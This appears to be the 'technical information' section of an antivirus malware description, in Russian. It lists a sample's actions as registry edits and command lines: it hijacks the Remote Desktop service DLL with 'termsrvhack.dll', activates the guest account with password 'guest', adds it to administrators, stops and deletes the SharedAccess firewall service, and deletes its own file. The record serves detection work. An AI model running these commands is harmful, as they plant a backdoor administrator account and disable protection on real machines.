Техническая информация
- [<HKLM>\SYSTEM\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '<SYSTEM32>\termsrvhack.dll'
- '%WINDIR%\syswow64\net.exe' stop SharedAccess /y
- '%WINDIR%\syswow64\cmd.exe' /c net user guest /active:yes && net user guest guest && net localgroup administrators guest /add && net stop SharedAccess /y && del "<Полный путь к файлу>" && sc delete SharedAccess' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c net user guest /active:yes && net user guest guest && net localgroup administrators guest /add && net stop SharedAccess /y && del "<Полный путь к файлу>" && sc delete SharedAccess
- '%WINDIR%\syswow64\net.exe' user guest /active:yes
- '%WINDIR%\syswow64\net1.exe' user guest /active:yes
- '%WINDIR%\syswow64\net.exe' user guest guest
- '%WINDIR%\syswow64\net1.exe' user guest guest
- '%WINDIR%\syswow64\net.exe' localgroup administrators guest /add
- '%WINDIR%\syswow64\net1.exe' localgroup administrators guest /add
- '%WINDIR%\syswow64\net1.exe' stop SharedAccess /y